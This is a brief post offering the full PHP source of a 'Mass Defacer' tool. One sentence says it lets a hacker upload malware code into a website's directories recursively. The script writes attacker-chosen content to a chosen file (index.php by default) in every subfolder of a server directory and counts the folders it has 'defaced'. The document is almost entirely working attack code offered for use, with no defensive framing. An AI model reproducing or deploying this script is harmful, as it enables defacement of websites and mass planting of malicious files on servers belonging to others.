With this tool the hacker can upload malware code to the websites dir (recursively!), with whatever name what he wants.
<?php error_reporting (NULL); set_time_limit (NULL); $ds = "/"; if (preg_match ("/WIN/", PHP_OS)) $ds = "\\"; $dir = getcwd (); $count = 0; echo ' <title>Mass Defacer by YunusIncredibl</title> <style>.my{border: solid 1px red}</style> <form method="POST"> Directory : <input class="my" size=40 type="text" name="basedir" value='.$dir.'><br><br> Name : <input class="my" size=40 type="text" name="name" value="index.php"><br><br> Your Index : <br><textarea style="width: 671px; height: 295px;" class="my" name="index"></textarea><br> <input type="submit" value="Start" name="go"> </form>'; if (@$_POST['go']) { echo "<textarea style='width: 875px; height: 255px;' class='my'>"; mass ($_POST['basedir'], $_POST['name'], $_POST['index']); echo "</textarea><br>Defaced : $count Folder :D"; } function mass ($dir, $name, $index) { global $ds; global $count; foreach (scandir2 ($dir) as $x) { if (is_dir ($dir.$ds.$x)) { if (file_put_contents ($dir.$ds.$x.$ds.$name, $index)) { echo $dir.$ds.$x.$ds.$name."\n"; $count++; } mass ($dir.$ds.$x, $name, $index); } } } function scandir2 ($dir) { $files = array (); if (file_exists ($dir)) { $d = opendir ($dir) or die (NULL); while ($file = readdir ($d)) { if ($file != "." && $file != "..") { array_push ($files, $file); } } } return $files; } ?>